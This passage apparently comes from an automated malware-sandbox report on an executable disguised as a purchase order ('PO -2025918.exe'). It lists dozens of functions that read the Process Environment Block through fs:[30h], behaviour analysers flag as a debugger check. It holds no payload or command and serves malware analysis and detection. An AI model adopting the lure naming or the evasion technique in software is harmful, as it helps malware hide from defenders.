Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C560B8 mov eax, dword ptr fs:[00000030h] 4_2_01C560B8
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C560B8 mov ecx, dword ptr fs:[00000030h] 4_2_01C560B8
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C16050 mov eax, dword ptr fs:[00000030h] 4_2_01C16050
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B8A020 mov eax, dword ptr fs:[00000030h] 4_2_01B8A020
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B8C020 mov eax, dword ptr fs:[00000030h] 4_2_01B8C020
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BAE016 mov eax, dword ptr fs:[00000030h] 4_2_01BAE016
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C14000 mov ecx, dword ptr fs:[00000030h] 4_2_01C14000
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C32000 mov eax, dword ptr fs:[00000030h] 4_2_01C32000
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBC073 mov eax, dword ptr fs:[00000030h] 4_2_01BBC073
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B92050 mov eax, dword ptr fs:[00000030h] 4_2_01B92050
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C26030 mov eax, dword ptr fs:[00000030h] 4_2_01C26030
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C163C0 mov eax, dword ptr fs:[00000030h] 4_2_01C163C0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C4C3CD mov eax, dword ptr fs:[00000030h] 4_2_01C4C3CD
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C343D4 mov eax, dword ptr fs:[00000030h] 4_2_01C343D4
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3E3DB mov eax, dword ptr fs:[00000030h] 4_2_01C3E3DB
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3E3DB mov ecx, dword ptr fs:[00000030h] 4_2_01C3E3DB
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B88397 mov eax, dword ptr fs:[00000030h] 4_2_01B88397
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B8E388 mov eax, dword ptr fs:[00000030h] 4_2_01B8E388
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB438F mov eax, dword ptr fs:[00000030h] 4_2_01BB438F
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC63FF mov eax, dword ptr fs:[00000030h] 4_2_01BC63FF
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BAE3F0 mov eax, dword ptr fs:[00000030h] 4_2_01BAE3F0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA03E9 mov eax, dword ptr fs:[00000030h] 4_2_01BA03E9
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9A3C0 mov eax, dword ptr fs:[00000030h] 4_2_01B9A3C0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B983C0 mov eax, dword ptr fs:[00000030h] 4_2_01B983C0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h] 4_2_01C12349
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h] 4_2_01C12349
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h] 4_2_01C12349
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h] 4_2_01C12349
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h] 4_2_01C12349
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h] 4_2_01C12349
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h] 4_2_01C12349
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h] 4_2_01C12349
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h] 4_2_01C12349
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h] 4_2_01C12349
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h] 4_2_01C12349
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h] 4_2_01C12349
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C6634F mov eax, dword ptr fs:[00000030h] 4_2_01C6634F
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C38350 mov ecx, dword ptr fs:[00000030h] 4_2_01C38350
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5A352 mov eax, dword ptr fs:[00000030h] 4_2_01C5A352
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1035C mov eax, dword ptr fs:[00000030h] 4_2_01C1035C
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1035C mov eax, dword ptr fs:[00000030h] 4_2_01C1035C
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1035C mov eax, dword ptr fs:[00000030h] 4_2_01C1035C
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1035C mov ecx, dword ptr fs:[00000030h] 4_2_01C1035C
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1035C mov eax, dword ptr fs:[00000030h] 4_2_01C1035C
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1035C mov eax, dword ptr fs:[00000030h] 4_2_01C1035C
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B8C310 mov ecx, dword ptr fs:[00000030h] 4_2_01B8C310
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB0310 mov ecx, dword ptr fs:[00000030h] 4_2_01BB0310
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCA30B mov eax, dword ptr fs:[00000030h] 4_2_01BCA30B
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCA30B mov eax, dword ptr fs:[00000030h] 4_2_01BCA30B
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCA30B mov eax, dword ptr fs:[00000030h] 4_2_01BCA30B
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3437C mov eax, dword ptr fs:[00000030h] 4_2_01C3437C
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C68324 mov eax, dword ptr fs:[00000030h] 4_2_01C68324
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C68324 mov ecx, dword ptr fs:[00000030h] 4_2_01C68324
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C68324 mov eax, dword ptr fs:[00000030h] 4_2_01C68324
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C68324 mov eax, dword ptr fs:[00000030h] 4_2_01C68324
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C662D6 mov eax, dword ptr fs:[00000030h] 4_2_01C662D6
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA02A0 mov eax, dword ptr fs:[00000030h] 4_2_01BA02A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA02A0 mov eax, dword ptr fs:[00000030h] 4_2_01BA02A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCE284 mov eax, dword ptr fs:[00000030h] 4_2_01BCE284
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCE284 mov eax, dword ptr fs:[00000030h] 4_2_01BCE284
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C10283 mov eax, dword ptr fs:[00000030h] 4_2_01C10283
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C10283 mov eax, dword ptr fs:[00000030h] 4_2_01C10283
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C10283 mov eax, dword ptr fs:[00000030h] 4_2_01C10283
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA02E1 mov eax, dword ptr fs:[00000030h] 4_2_01BA02E1
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA02E1 mov eax, dword ptr fs:[00000030h] 4_2_01BA02E1
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA02E1 mov eax, dword ptr fs:[00000030h] 4_2_01BA02E1
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C262A0 mov eax, dword ptr fs:[00000030h] 4_2_01C262A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C262A0 mov ecx, dword ptr fs:[00000030h] 4_2_01C262A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C262A0 mov eax, dword ptr fs:[00000030h] 4_2_01C262A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C262A0 mov eax, dword ptr fs:[00000030h] 4_2_01C262A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C262A0 mov eax, dword ptr fs:[00000030h] 4_2_01C262A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C262A0 mov eax, dword ptr fs:[00000030h] 4_2_01C262A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9A2C3 mov eax, dword ptr fs:[00000030h] 4_2_01B9A2C3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9A2C3 mov eax, dword ptr fs:[00000030h] 4_2_01B9A2C3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9A2C3 mov eax, dword ptr fs:[00000030h] 4_2_01B9A2C3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9A2C3 mov eax, dword ptr fs:[00000030h] 4_2_01B9A2C3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9A2C3 mov eax, dword ptr fs:[00000030h] 4_2_01B9A2C3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C18243 mov eax, dword ptr fs:[00000030h] 4_2_01C18243
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C18243 mov ecx, dword ptr fs:[00000030h] 4_2_01C18243
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B8823B mov eax, dword ptr fs:[00000030h] 4_2_01B8823B
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C4A250 mov eax, dword ptr fs:[00000030h] 4_2_01C4A250
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C4A250 mov eax, dword ptr fs:[00000030h] 4_2_01C4A250
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C6625D mov eax, dword ptr fs:[00000030h] 4_2_01C6625D
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h] 4_2_01C40274
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h] 4_2_01C40274
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h] 4_2_01C40274
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h] 4_2_01C40274
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h] 4_2_01C40274
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h] 4_2_01C40274
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h] 4_2_01C40274
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h] 4_2_01C40274
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h] 4_2_01C40274
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h] 4_2_01C40274
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h] 4_2_01C40274
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h] 4_2_01C40274
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B8826B mov eax, dword ptr fs:[00000030h] 4_2_01B8826B
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B94260 mov eax, dword ptr fs:[00000030h] 4_2_01B94260
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B94260 mov eax, dword ptr fs:[00000030h] 4_2_01B94260
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B94260 mov eax, dword ptr fs:[00000030h] 4_2_01B94260
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B96259 mov eax, dword ptr fs:[00000030h] 4_2_01B96259
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B8A250 mov eax, dword ptr fs:[00000030h] 4_2_01B8A250
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB45B1 mov eax, dword ptr fs:[00000030h] 4_2_01BB45B1
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB45B1 mov eax, dword ptr fs:[00000030h] 4_2_01BB45B1
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCE59C mov eax, dword ptr fs:[00000030h] 4_2_01BCE59C
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC4588 mov eax, dword ptr fs:[00000030h] 4_2_01BC4588
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B92582 mov eax, dword ptr fs:[00000030h] 4_2_01B92582
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B92582 mov ecx, dword ptr fs:[00000030h] 4_2_01B92582
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCC5ED mov eax, dword ptr fs:[00000030h] 4_2_01BCC5ED
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCC5ED mov eax, dword ptr fs:[00000030h] 4_2_01BCC5ED
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B925E0 mov eax, dword ptr fs:[00000030h] 4_2_01B925E0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBE5E7 mov eax, dword ptr fs:[00000030h] 4_2_01BBE5E7
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBE5E7 mov eax, dword ptr fs:[00000030h] 4_2_01BBE5E7
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBE5E7 mov eax, dword ptr fs:[00000030h] 4_2_01BBE5E7
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBE5E7 mov eax, dword ptr fs:[00000030h] 4_2_01BBE5E7
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBE5E7 mov eax, dword ptr fs:[00000030h] 4_2_01BBE5E7
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBE5E7 mov eax, dword ptr fs:[00000030h] 4_2_01BBE5E7
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBE5E7 mov eax, dword ptr fs:[00000030h] 4_2_01BBE5E7
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBE5E7 mov eax, dword ptr fs:[00000030h] 4_2_01BBE5E7
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C105A7 mov eax, dword ptr fs:[00000030h] 4_2_01C105A7
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C105A7 mov eax, dword ptr fs:[00000030h] 4_2_01C105A7
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C105A7 mov eax, dword ptr fs:[00000030h] 4_2_01C105A7
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B965D0 mov eax, dword ptr fs:[00000030h] 4_2_01B965D0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCA5D0 mov eax, dword ptr fs:[00000030h] 4_2_01BCA5D0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCA5D0 mov eax, dword ptr fs:[00000030h] 4_2_01BCA5D0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCE5CF mov eax, dword ptr fs:[00000030h] 4_2_01BCE5CF
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCE5CF mov eax, dword ptr fs:[00000030h] 4_2_01BCE5CF
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBE53E mov eax, dword ptr fs:[00000030h] 4_2_01BBE53E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBE53E mov eax, dword ptr fs:[00000030h] 4_2_01BBE53E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBE53E mov eax, dword ptr fs:[00000030h] 4_2_01BBE53E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBE53E mov eax, dword ptr fs:[00000030h] 4_2_01BBE53E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBE53E mov eax, dword ptr fs:[00000030h] 4_2_01BBE53E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA0535 mov eax, dword ptr fs:[00000030h] 4_2_01BA0535
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA0535 mov eax, dword ptr fs:[00000030h] 4_2_01BA0535
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA0535 mov eax, dword ptr fs:[00000030h] 4_2_01BA0535
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA0535 mov eax, dword ptr fs:[00000030h] 4_2_01BA0535
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA0535 mov eax, dword ptr fs:[00000030h] 4_2_01BA0535
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA0535 mov eax, dword ptr fs:[00000030h] 4_2_01BA0535
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C26500 mov eax, dword ptr fs:[00000030h] 4_2_01C26500
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C64500 mov eax, dword ptr fs:[00000030h] 4_2_01C64500
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C64500 mov eax, dword ptr fs:[00000030h] 4_2_01C64500
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C64500 mov eax, dword ptr fs:[00000030h] 4_2_01C64500
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C64500 mov eax, dword ptr fs:[00000030h] 4_2_01C64500
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C64500 mov eax, dword ptr fs:[00000030h] 4_2_01C64500
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C64500 mov eax, dword ptr fs:[00000030h] 4_2_01C64500
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C64500 mov eax, dword ptr fs:[00000030h] 4_2_01C64500
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC656A mov eax, dword ptr fs:[00000030h] 4_2_01BC656A
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC656A mov eax, dword ptr fs:[00000030h] 4_2_01BC656A
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC656A mov eax, dword ptr fs:[00000030h] 4_2_01BC656A
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B98550 mov eax, dword ptr fs:[00000030h] 4_2_01B98550
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B98550 mov eax, dword ptr fs:[00000030h] 4_2_01B98550
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC44B0 mov ecx, dword ptr fs:[00000030h] 4_2_01BC44B0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B964AB mov eax, dword ptr fs:[00000030h] 4_2_01B964AB
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B904E5 mov ecx, dword ptr fs:[00000030h] 4_2_01B904E5
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C4A49A mov eax, dword ptr fs:[00000030h] 4_2_01C4A49A
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1A4B0 mov eax, dword ptr fs:[00000030h] 4_2_01C1A4B0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C4A456 mov eax, dword ptr fs:[00000030h] 4_2_01C4A456
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B8E420 mov eax, dword ptr fs:[00000030h] 4_2_01B8E420
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B8E420 mov eax, dword ptr fs:[00000030h] 4_2_01B8E420
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B8E420 mov eax, dword ptr fs:[00000030h] 4_2_01B8E420
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B8C427 mov eax, dword ptr fs:[00000030h] 4_2_01B8C427
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1C460 mov ecx, dword ptr fs:[00000030h] 4_2_01C1C460
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC8402 mov eax, dword ptr fs:[00000030h] 4_2_01BC8402
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC8402 mov eax, dword ptr fs:[00000030h] 4_2_01BC8402
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC8402 mov eax, dword ptr fs:[00000030h] 4_2_01BC8402
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBA470 mov eax, dword ptr fs:[00000030h] 4_2_01BBA470
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBA470 mov eax, dword ptr fs:[00000030h] 4_2_01BBA470
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBA470 mov eax, dword ptr fs:[00000030h] 4_2_01BBA470
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB245A mov eax, dword ptr fs:[00000030h] 4_2_01BB245A
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C16420 mov eax, dword ptr fs:[00000030h] 4_2_01C16420
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C16420 mov eax, dword ptr fs:[00000030h] 4_2_01C16420
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C16420 mov eax, dword ptr fs:[00000030h] 4_2_01C16420
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C16420 mov eax, dword ptr fs:[00000030h] 4_2_01C16420
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C16420 mov eax, dword ptr fs:[00000030h] 4_2_01C16420
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C16420 mov eax, dword ptr fs:[00000030h] 4_2_01C16420
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C16420 mov eax, dword ptr fs:[00000030h] 4_2_01C16420
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B8645D mov eax, dword ptr fs:[00000030h] 4_2_01B8645D
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCE443 mov eax, dword ptr fs:[00000030h] 4_2_01BCE443
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCE443 mov eax, dword ptr fs:[00000030h] 4_2_01BCE443
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCE443 mov eax, dword ptr fs:[00000030h] 4_2_01BCE443
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCE443 mov eax, dword ptr fs:[00000030h] 4_2_01BCE443
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCE443 mov eax, dword ptr fs:[00000030h] 4_2_01BCE443
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCE443 mov eax, dword ptr fs:[00000030h] 4_2_01BCE443
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCE443 mov eax, dword ptr fs:[00000030h] 4_2_01BCE443
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCE443 mov eax, dword ptr fs:[00000030h] 4_2_01BCE443
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C107C3 mov eax, dword ptr fs:[00000030h] 4_2_01C107C3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B907AF mov eax, dword ptr fs:[00000030h] 4_2_01B907AF
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1E7E1 mov eax, dword ptr fs:[00000030h] 4_2_01C1E7E1
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B947FB mov eax, dword ptr fs:[00000030h] 4_2_01B947FB
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B947FB mov eax, dword ptr fs:[00000030h] 4_2_01B947FB
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3678E mov eax, dword ptr fs:[00000030h] 4_2_01C3678E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB27ED mov eax, dword ptr fs:[00000030h] 4_2_01BB27ED
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB27ED mov eax, dword ptr fs:[00000030h] 4_2_01BB27ED
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB27ED mov eax, dword ptr fs:[00000030h] 4_2_01BB27ED
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C447A0 mov eax, dword ptr fs:[00000030h] 4_2_01C447A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9C7C0 mov eax, dword ptr fs:[00000030h] 4_2_01B9C7C0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC273C mov eax, dword ptr fs:[00000030h] 4_2_01BC273C
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC273C mov ecx, dword ptr fs:[00000030h] 4_2_01BC273C
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC273C mov eax, dword ptr fs:[00000030h] 4_2_01BC273C
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C14755 mov eax, dword ptr fs:[00000030h] 4_2_01C14755
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCC720 mov eax, dword ptr fs:[00000030h] 4_2_01BCC720
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCC720 mov eax, dword ptr fs:[00000030h] 4_2_01BCC720
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1E75D mov eax, dword ptr fs:[00000030h] 4_2_01C1E75D
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B90710 mov eax, dword ptr fs:[00000030h] 4_2_01B90710
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC0710 mov eax, dword ptr fs:[00000030h] 4_2_01BC0710
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCC700 mov eax, dword ptr fs:[00000030h] 4_2_01BCC700
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B98770 mov eax, dword ptr fs:[00000030h] 4_2_01B98770
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h] 4_2_01BA0770
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h] 4_2_01BA0770
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h] 4_2_01BA0770
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h] 4_2_01BA0770
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h] 4_2_01BA0770
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h] 4_2_01BA0770
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h] 4_2_01BA0770
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h] 4_2_01BA0770
